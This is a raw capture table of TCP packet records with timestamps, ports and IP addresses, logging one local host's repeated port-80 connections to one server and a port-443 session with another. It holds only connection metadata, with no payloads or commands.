Apr 29, 2024 01:03:07.860769033 CEST	80	49774	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.861212969 CEST	80	49774	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.861439943 CEST	49774	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.894721031 CEST	49775	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.985871077 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:07.985964060 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:07.987986088 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:07.988009930 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:07.988380909 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:07.995592117 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:07.996781111 CEST	49774	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:08.005240917 CEST	80	49775	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:08.005333900 CEST	49775	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:08.005433083 CEST	49775	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:08.012216091 CEST	80	49774	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:08.040113926 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.108026028 CEST	80	49774	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:08.108094931 CEST	49774	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:08.115835905 CEST	80	49775	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:08.116322041 CEST	80	49775	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:08.116647959 CEST	49775	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:08.122554064 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:08.122626066 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:08.122684002 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:08.122684002 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:08.123413086 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:08.126044989 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:08.168922901 CEST	49776	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:08.227123976 CEST	80	49775	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:08.278624058 CEST	80	49776	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:08.279033899 CEST	49776	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:08.279171944 CEST	49776	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:08.347121954 CEST	49776	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:08.363615036 CEST	49775	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:08.376635075 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.376658916 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.388695955 CEST	80	49776	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:08.388940096 CEST	80	49776	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:08.389014959 CEST	49776	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:08.390526056 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.390541077 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.390589952 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.390594006 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.390639067 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.390641928 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.390681028 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.390682936 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.390759945 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.390772104 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.390794992 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.390800953 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.390821934 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.390826941 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.390852928 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.390860081 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.390889883 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.390897036 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.390914917 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.390921116 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.390944004 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.390949965 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.390980959 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.390986919 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.391000032 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.391005039 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.391036034 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.391041994 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.391057014 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.391060114 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.391089916 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.391102076 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.391113997 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.391129017 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.391144037 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.391150951 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.391174078 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.391182899 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.391197920 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.391204119 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.391227961 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.391232967 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.391254902 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.391258955 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.391280890 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.391288996 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.391325951 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.391330957 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.391350985 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.391355991 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.391374111 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.391380072 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.391402960 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.391407967 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.391429901 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.391436100 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.391468048 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:08.391540051 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.398468971 CEST	80	49775	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:08.398519993 CEST	80	49775	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:08.398596048 CEST	49775	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:08.398596048 CEST	49775	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:08.421143055 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:08.457693100 CEST	80	49776	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:08.459022045 CEST	49776	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:08.474566936 CEST	80	49775	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:08.478506088 CEST	49775	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:08.534043074 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:09.395718098 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:09.395813942 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:09.395903111 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:09.395925999 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:09.733315945 CEST	49777	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:09.733395100 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:09.843063116 CEST	80	49777	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:09.843162060 CEST	49777	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:09.843292952 CEST	49777	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:09.953066111 CEST	80	49777	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:09.953226089 CEST	80	49777	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:09.953404903 CEST	49777	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:10.104053974 CEST	80	49777	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:10.331360102 CEST	80	49777	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:10.331403017 CEST	80	49777	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:10.331461906 CEST	49777	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:10.727204084 CEST	49777	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:10.727793932 CEST	49778	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:10.837260008 CEST	80	49777	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:10.837316990 CEST	49777	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:10.838118076 CEST	80	49778	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:10.838174105 CEST	49778	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:10.838294029 CEST	49778	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:10.948549032 CEST	80	49778	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:10.949091911 CEST	80	49778	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:10.949290037 CEST	49778	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:11.101805925 CEST	80	49778	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:11.342880011 CEST	80	49778	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:11.342926025 CEST	80	49778	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:11.342973948 CEST	49778	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:11.470276117 CEST	49778	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:11.471152067 CEST	49779	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:11.581403017 CEST	80	49778	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:11.581446886 CEST	80	49779	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:11.581476927 CEST	49778	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:11.581551075 CEST	49779	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:11.581865072 CEST	49779	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:11.692148924 CEST	80	49779	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:11.692524910 CEST	80	49779	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:11.692837954 CEST	49779	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:11.844768047 CEST	80	49779	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:12.095587015 CEST	80	49779	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:12.095607042 CEST	80	49779	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:12.095668077 CEST	49779	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:12.222143888 CEST	49779	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:12.222664118 CEST	49780	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:12.333170891 CEST	80	49780	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:12.333261967 CEST	49780	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:12.333444118 CEST	49780	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:12.333465099 CEST	80	49779	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:12.333523035 CEST	49779	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:12.443737984 CEST	80	49780	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:12.444514990 CEST	80	49780	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:12.444662094 CEST	49780	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:12.595877886 CEST	80	49780	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:12.836689949 CEST	80	49780	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:12.836728096 CEST	80	49780	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:12.836785078 CEST	49780	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:14.527518988 CEST	49780	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:14.528304100 CEST	49781	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:14.638238907 CEST	80	49780	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:14.638329983 CEST	49780	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:14.638683081 CEST	80	49781	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:14.638758898 CEST	49781	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:14.653798103 CEST	49781	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:14.658463955 CEST	49782	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:14.764275074 CEST	80	49781	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:14.764416933 CEST	80	49781	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:14.764650106 CEST	49781	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:14.768002033 CEST	80	49782	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:14.768093109 CEST	49782	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:14.768249035 CEST	49782	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:14.875085115 CEST	80	49781	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:14.877676964 CEST	80	49782	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:14.877993107 CEST	80	49782	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:14.878349066 CEST	49782	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:15.028098106 CEST	80	49782	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:15.171694994 CEST	80	49781	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:15.171720028 CEST	80	49781	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:15.171842098 CEST	49781	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:15.297904968 CEST	80	49782	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:15.297954082 CEST	80	49782	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:15.298018932 CEST	49782	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:15.641928911 CEST	49781	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:15.641995907 CEST	49782	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:15.643202066 CEST	49783	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:15.752355099 CEST	80	49782	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:15.752427101 CEST	49782	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:15.752785921 CEST	80	49781	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:15.752845049 CEST	49781	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:15.753566980 CEST	80	49783	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:15.753626108 CEST	49783	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:15.753792048 CEST	49783	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:15.864073992 CEST	80	49783	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:15.864470005 CEST	80	49783	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:15.885550022 CEST	49783	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:16.037511110 CEST	80	49783	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:16.281096935 CEST	80	49783	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:16.281164885 CEST	80	49783	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:16.281233072 CEST	49783	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:19.875561953 CEST	49783	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:19.986063957 CEST	49784	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:19.987045050 CEST	80	49783	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:19.987133026 CEST	49783	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:20.096059084 CEST	80	49784	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:20.096168041 CEST	49784	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:20.096327066 CEST	49784	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:20.197742939 CEST	49785	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:20.206423044 CEST	80	49784	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:20.206621885 CEST	80	49784	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:20.206804991 CEST	49784	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:20.308300972 CEST	80	49785	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:20.308386087 CEST	49785	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:20.308522940 CEST	49785	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:20.358021021 CEST	80	49784	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:20.418867111 CEST	80	49785	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:20.419194937 CEST	80	49785	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:20.419712067 CEST	49785	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:20.530256033 CEST	80	49785	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:20.624994040 CEST	80	49784	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:20.625046968 CEST	80	49784	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:20.625128984 CEST	49784	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:20.704251051 CEST	80	49785	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:20.704294920 CEST	80	49785	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:20.704356909 CEST	49785	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:20.807504892 CEST	49784	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:20.807580948 CEST	49785	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:20.814280033 CEST	49786	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:20.918390989 CEST	80	49784	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:20.918453932 CEST	49784	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:20.918732882 CEST	80	49785	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:20.918785095 CEST	49785	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:20.924644947 CEST	80	49786	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:20.924828053 CEST	49786	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:20.924870968 CEST	49786	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:21.035518885 CEST	80	49786	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:21.036001921 CEST	80	49786	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:21.036187887 CEST	49786	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:21.186702967 CEST	80	49786	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:21.433197021 CEST	80	49786	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:21.433227062 CEST	80	49786	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:21.433294058 CEST	49786	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:21.547605038 CEST	49786	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:21.548393011 CEST	49787	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:21.658201933 CEST	80	49787	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:21.658257961 CEST	80	49786	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:21.658422947 CEST	49786	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:21.658449888 CEST	49787	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:21.658667088 CEST	49787	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:21.768296003 CEST	80	49787	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:21.768809080 CEST	80	49787	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:21.768948078 CEST	49787	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:21.918744087 CEST	80	49787	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:22.190656900 CEST	80	49787	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:22.190738916 CEST	80	49787	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:22.190805912 CEST	49787	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:22.313308001 CEST	49787	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:22.314500093 CEST	49788	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:22.423428059 CEST	80	49787	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:22.423521996 CEST	49787	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:22.424772024 CEST	80	49788	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:22.424860001 CEST	49788	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:22.425050020 CEST	49788	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:22.535353899 CEST	80	49788	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:22.536025047 CEST	80	49788	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:22.540258884 CEST	49788	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:22.691715002 CEST	80	49788	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:22.936774969 CEST	80	49788	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:22.936809063 CEST	80	49788	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:22.936903000 CEST	49788	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:24.398483992 CEST	49788	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:24.400607109 CEST	49789	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:24.509730101 CEST	80	49788	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:24.509800911 CEST	49788	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:24.510467052 CEST	80	49789	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:24.510545015 CEST	49789	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:24.510818005 CEST	49789	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:24.620719910 CEST	80	49789	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:24.620783091 CEST	80	49789	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:24.621141911 CEST	49789	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:24.772197962 CEST	80	49789	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:25.039441109 CEST	80	49789	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:25.039473057 CEST	80	49789	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:25.039530039 CEST	49789	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:25.209563971 CEST	49789	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:25.210777044 CEST	49790	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:25.319674969 CEST	80	49789	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:25.319736004 CEST	49789	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:25.320836067 CEST	80	49790	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:25.320909977 CEST	49790	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:25.321063995 CEST	49790	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:25.431018114 CEST	80	49790	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:25.431123018 CEST	80	49790	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:25.432352066 CEST	49790	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:25.583349943 CEST	80	49790	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:25.723263025 CEST	49791	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:25.834330082 CEST	80	49791	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:25.834445000 CEST	49791	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:25.834630966 CEST	49791	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:25.849071980 CEST	80	49790	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:25.849101067 CEST	80	49790	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:25.849109888 CEST	80	49790	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:25.849267006 CEST	49790	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:25.946748018 CEST	80	49791	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:25.946778059 CEST	80	49791	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:25.947000027 CEST	49791	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:25.971800089 CEST	49790	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:25.972476006 CEST	49792	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:26.056989908 CEST	80	49791	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:26.082719088 CEST	80	49792	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:26.082757950 CEST	80	49790	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:26.082799911 CEST	49792	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:26.082834005 CEST	49790	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:26.094540119 CEST	49792	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:26.204391956 CEST	80	49792	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:26.205290079 CEST	80	49792	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:26.205492020 CEST	49792	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:26.324364901 CEST	80	49791	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:26.324434996 CEST	80	49791	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:26.324587107 CEST	49791	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:26.355658054 CEST	80	49792	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:26.589536905 CEST	80	49792	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:26.589595079 CEST	80	49792	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:26.589631081 CEST	80	49792	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:26.589644909 CEST	49792	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:26.643388987 CEST	49792	80	192.168.2.4	172.67.144.153
